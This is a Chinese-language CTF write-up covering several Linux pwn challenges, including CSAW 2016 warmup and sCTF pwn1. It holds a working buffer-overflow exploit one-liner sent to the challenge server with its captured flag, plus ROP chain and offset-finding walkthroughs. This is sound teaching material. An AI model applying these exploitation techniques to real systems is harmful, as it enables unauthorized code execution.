文章目錄

• • doubly_dangerous
  • WarmUp
  • • 關于確定溢出點的一種方法:gdb-peda
    • 關于利用ret調用shellcode
    • • 函數調用方式的基本介紹
  • pwn1
  • just_do_it

題目

doubly_dangerous

內存中找到浮點數據，覆蓋用來比較的局部變量v2即可。

WarmUp

以下為同一個題目兩種版本：

• 國外版：
  
  棧不可執行。
• 國內版：
  

通過覆蓋返回地址直接跳轉到函數easy，我測試失敗，接收報錯，ida單步后實際進入easy。



查詢資料發現可以使用ret做nop。

• 在文件內存中搜尋指令retROPgadget --binary warmup | grep 'ret'
  

關于確定溢出點的一種方法:gdb-peda

$ objdump -M intel -d warmup | grep "<easy>" -A 6 000000000040060d <easy>:40060d: 55 push rbp40060e: 48 89 e5 mov rbp,rsp400611: bf 34 07 40 00 mov edi,0x400734400616: e8 b5 fe ff ff call 4004d0 <system@plt>40061b: 5d pop rbp40061c: c3 ret $ gdb -q ./warmup Reading symbols from ./warmup...(no debugging symbols found)...done. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial gdb-peda$ pattern create 100 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL' gdb-peda$ r Starting program: /root/warmup -Warm Up- WOW:0x40060d >AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL0x40069e <main+129>: call 0x400500 <gets@plt>0x4006a3 <main+134>: leave => 0x4006a4 <main+135>: retStopped reason: SIGSEGV 0x00000000004006a4 in main () gdb-peda$ x /gx $rsp 0x7fffffffe878: 0x4134414165414149 gdb-peda$ pattern offset 0x4134414165414149 4698452060381725001 found at offset: 72 $ python -c 'from struct import pack as p; print "A" * 72 + p("Q", 0x40060d)' | nc pwn.chal.csaw.io 8000 -Warm Up- WOW:0x40060d >FLAG{LET_US_BEGIN_CSAW_2016}

關于利用ret調用shellcode

函數調用方式的基本介紹

32位程序默認調用函數的方式為先將參數壓入棧中,靠近call指令的是第一個參數
而64位程序默認調用函數的方式則不同
RDI 中存放第1個參數
RSI 中存放第2個參數
RDX 中存放第3個參數
RCX 中存放第4個參數
R8 中存放第5個參數
R9 中存放第6個參數
如果還有更多的參數,再把過多那幾個的參數像32位程序一樣壓入棧中
然后 call
rop 的基本介紹
這里只說一下64位程序的rop,了解完64位的rop,32位的程序稍微做一下函數調用方式上的改變就好了

比如:現在有3個函數 a(&arg1,arg2),b(arg3,arg4),c(arg1),其中b函數有棧溢出漏洞,a函數是個輸入函數,c函數是system函數

我們要利用b函數的漏洞,運行c函數,而c函數需要從a函數上得到"/bin/sh"這種參數

該怎么做呢?

首先我們要知道 call 指令與 ret 指令是有兩步操作的
call指令:

先把下一句指令的地址壓入棧頂 rsp+=8

跳轉到call后面跟的地址上去
ret指令:

跳轉到rsp所指的地址(之前的call壓入的)

rsp-=8
如果我們調用函數時不使用call指令呢?

函數結束時,移動棧頂(清棧) jmp [rsp] ,rsp-=8
程序中找 pop rsi,pop rdi,ret 這種相連的指令(不相連也可以,不要再影響rsi,rdi就好),把地址記錄下來pop_ret

程序中找 pop rdi,ret 這種相連的指令,把地址記錄下來pop_ret2

好,我們把c函數的rbp+8的位置寫 pop_ret 的地址

rbp+8 pop_ret
rbp+16 arg2
rbp+24 arg1
rbp+32 a函數的地址
rbp+40 pop_ret2
rbp+48 arg1
rbp+56 c函數的地址
當b運行結束后,會返回到 pop_ret 位置

pop rsi rsi=arg2

pop rdi rdi=agr1

jmp a函數

a函數 執行完后 會ret 到pop_ret2

pop rdi rdi=arg1

然后運行c函數

pwn1

• 查看文件頭

  file pwn1 objdump -f pwn1 readelf -h pwn1

• 查看保護

  checksec pwn1

• r2

  root@24f5cb72be5c:/ctf/work/0x01/sCTF 2016 q1-pwn1# r2 pwn1 [0x08048e10]> aaa [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze len bytes of instructions for references (aar) [x] Analyze function calls (aac) [x] Use -AA or aaaa to perform additional experimental analysis. [ ] Constructing a function name for fcn.* and sym.func.* functions [x] Constructing a function name for fcn.* and sym.func.* functions (aan) [0x08048e10]> s main [0x0804932d]> pdf;-- main: / (fcn) sym.main 18 | sym.main (); | ; DATA XREF from 0x08048e27 (entry0) | 0x0804932d 55 push ebp | 0x0804932e 89e5 mov ebp, esp | 0x08049330 83e4f0 and esp, 0xfffffff0 | 0x08049333 e877feffff call sym.vuln | 0x08049338 b800000000 mov eax, 0 | 0x0804933d c9 leave \ 0x0804933e c3 ret [0x0804932d]> f~vuln 0x080491af 298 sym.vuln [0x0804932d]> iz #查看字符串 [0x0804932d]> ii #查看導入 [0x0804932d]> ia #查看導出函數

• objdump

  objdump -T pwn1 #查看PLTobjdump -R pwn1 #查看GOT

strcpy有溢出點，但是源字符串來源有32個的限制，而開辟的棧有0x3c，覆蓋不到ret。
原文提示為：

I’ll convert a first person statement to a second person statement. I even wrote it in C++ to be super-safe about my strings!

提示說明程序將自我介紹的第一人稱該為第二人稱；即我是XX -> 你是xx。
結合偽代碼猜測是將I替換為了you。那么可以通過多個I膨脹為you。
0x3C =60； 3 * 21 + 1 = 64即可以覆蓋ret。

just_do_it

輸入的緩存s能接收32字節，打印函數puts的參數v6與s的棧地址差為20字節，那么直接覆蓋v6為全局變量flag即可。

總結

以上是生活随笔為你收集整理的linux pwn练习0x01的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。